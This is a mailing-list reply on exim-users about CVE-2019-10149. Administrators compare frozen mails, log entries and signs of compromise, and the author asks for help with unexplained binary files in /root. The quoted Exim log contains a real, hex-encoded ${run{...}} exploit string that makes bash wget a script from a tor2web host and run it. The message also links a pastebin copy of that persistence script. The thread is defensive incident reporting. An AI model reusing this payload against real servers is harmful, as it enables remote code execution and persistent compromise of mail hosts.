Re: [exim] CVE-2019-10149: already vulnerable ?

Startseite
Nachricht löschen
Nachricht beantworten
Autor: mixed8e
Datum:  
To: exim-users
Betreff: Re: [exim] CVE-2019-10149: already vulnerable ?
> On Fri, 2019-06-21 at 15:53 +0200, Heiko Schlittermann via Exim-users
> wrote:
>> Check your system for unusual activities.
>> Symptoms on a hacked system I got aware of were quite similar. The
>> log
>> reported about too many received headers:
>>
>> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
>> 2019-06-20 15:13:33 Received from <> H=(<zensored>.de)
>> [89.248.171.57] P=smtp S=1114
>> 2019-06-20 15:13:33 routing failed for
>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
>> k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
>> x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
>> 20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@<zen
>> sored>.de: Too many "Received" headers - suspected mail loop
>> *** Frozen (delivery error message)
> Checked my mail server today as well and found 46 frozen mails and
> plenty of the same log messages. All of the mails were sent from a
> single IP: 89.248.171.57 (scanner20.openportstats.com) and apparently
> are sent every 3 hours.
>
> As far as I can tell nothing was changed on the server though. Files
> are fine, cron entries are standard and no cryptominer is running (CPU
> utilization is low).


I got to see this on a server where the attack was successful. The code
executed by the wget in the ${run...} command downloaded this script:

https://pastebin.com/c3LKPEDU

It tries to maintain infection by inserting several cron changes and copy
itself in several places around the file system.

On another machine it looks like I saw a different attack, but I don't
know enough about Exim. There are a large number of files in /root (Exim
is being run as root on this server) that have names like:

86NoHEg
DBaH23d
f8fam2O
Cg8E4NM

Those files are all binary, but the dates on them confuse me: there are a
group from June 15, June 16, then there is a group from May 20 which is
before the exploit was announced. Perhaps this is unrelated? There are no
cron job entries that try to execute these files. I'm not sure what to
make of them.

Help?